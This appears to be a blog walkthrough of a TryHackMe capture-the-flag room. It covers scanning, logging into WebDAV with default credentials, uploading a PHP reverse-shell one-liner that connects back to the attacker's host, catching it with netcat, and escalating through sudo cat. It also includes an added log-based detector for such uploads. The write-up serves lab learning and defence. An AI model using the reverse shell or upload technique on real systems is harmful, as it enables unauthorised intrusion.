Heyo let's walk it out with yours truly Bobloblaw. This will be a walkthrough of TryHackMe's Dav:
Scanning & Enumeration
As always, we start by scanning the box with Mayor's Threader3000, whose results are then fed into an nmap scan:
If you only want to run the nmap scan, the syntax used above is:
nmap -T4 -Pn -p80 -A 10.10.232.204
Enumerating Services
The only open port for this box is a web server so let's explore that!
Port 80 - HTTP
Visiting the IP address, it's just a default Apache page with nothing interesting in the source code, so let's enumerate the directories:
I use dirsearch to do this:
dirsearch -x 404,403 -e '*' -r -u 10.10.232.204
We find some interesting directories when we do this, and visiting `webdav` we see that we need to supply some credentials.
A brief search for WebDAV default credentials turns up a wonderful link that lists them, and with those we have access!
Vulnerable WebApp
Now that we have credentials, reading the link I showed earlier a bit more closely, we see that once authenticated we can log in to the webdav directory and may be able to upload files. Naturally, I'll try uploading a reverse shell to see if we can get onto the system!
Using cadaver, as shown in the above link, we can connect to the WebDAV share with our credentials:
Now to see if we can upload a reverse shell:
Success! The shell I like to use is this one liner:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'");
Awesome!
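From the defender's side, the upload-then-execute sequence above leaves a clear trace in the web server's access log. The following is an added example (not code from the original write-up) that parses Apache combined-format log lines and flags a script file written under the WebDAV path via a successful PUT, then escalates when that same path is later fetched. The log lines, the `davuser` account name and the `/webdav/` prefix are constructed assumptions.

```python
import re

# Constructed Apache access-log lines (not from the post) mirroring the room's flow:
# an authenticated WebDAV PUT of a .php file, then a plain GET that executes it.
SAMPLE_LOG = """\
10.9.1.5 - - [11/Jan/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 11321 "-" "Mozilla/5.0"
10.9.1.5 - davuser [11/Jan/2021:10:02:40 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 1200 "-" "cadaver/0.23"
10.9.1.5 - davuser [11/Jan/2021:10:02:55 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 212 "-" "cadaver/0.23"
10.9.1.5 - davuser [11/Jan/2021:10:03:10 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 212 "-" "cadaver/0.23"
10.9.1.5 - - [11/Jan/2021:10:03:30 +0000] "GET /webdav/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Extensions the web server would hand to an interpreter when the file is requested.
SCRIPT_EXTS = ('.php', '.phtml', '.php5', '.phar', '.jsp', '.asp', '.aspx', '.cgi', '.pl', '.py')

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['path'] = rec['path'].split('?', 1)[0]  # drop any query string
    return rec

def detect_webdav_script_upload(lines, dav_prefix='/webdav/'):
    """Flag a script PUT under the WebDAV prefix, then any later 200 GET/POST of that path."""
    uploaded = {}  # path -> (ip, user, time) of the PUT that created it
    alerts = []    # list of (severity, message)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, method, status = rec['path'], rec['method'], rec['status']
        if (method == 'PUT' and path.startswith(dav_prefix)
                and 200 <= status < 300 and path.lower().endswith(SCRIPT_EXTS)):
            uploaded[path] = (rec['ip'], rec['user'], rec['time'])
            alerts.append(('high', f"{rec['ip']} (user {rec['user']}) uploaded "
                                   f"script {path} via WebDAV at {rec['time']}"))
        elif method in ('GET', 'POST') and path in uploaded and status == 200:
            src_ip, src_user, _ = uploaded[path]
            alerts.append(('critical', f"{rec['ip']} fetched uploaded script {path} "
                                       f"at {rec['time']} (put there by {src_user}@{src_ip})"))
    return alerts
```

Running `detect_webdav_script_upload(SAMPLE_LOG.splitlines())` on the constructed lines yields one high alert for the PUT and one critical alert for the GET, while the harmless `notes.txt` upload is ignored.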
Getting User Flag
Now that we have uploaded our payload successfully, all we have left to do is catch it with a listener:
nc -nvlp 4444
With the listener running, navigating to the uploaded file in the browser executes it and we gain a shell:
As always, I want a fully interactive shell, which we get like this:
python -c "import pty; pty.spawn('/bin/bash')"
ctrl + z
stty raw -echo
fg
fg
export TERM=xterm-256color
Breaking it down:
- The python command spawns bash inside a pseudo-terminal (pty), giving us an interactive bash shell
- We then background that shell with ctrl + z
- We then run `stty raw -echo` on our local terminal so keystrokes such as tab (autocomplete) and ctrl+c are passed straight through to the remote shell instead of being handled locally
- We then foreground the shell twice and we have our fully interactive shell
After executing these commands we have a fully interactive shell which has autocomplete and ctrl+c capabilities. Now let's see if we can get that flag:
Indeed we can!
Root Flag
One of the first things to always check after getting a foothold is your sudo rights. Doing this:
We see that we have sudo rights for `cat`, which is mighty convenient for a CTF. Taking advantage of this:
And we obtain the root flag!
That's all for now, thanks for reading! If there are any questions or feedback about anything I did, as always, you can reach me on the THM website or on their discord server under the name bobloblaw.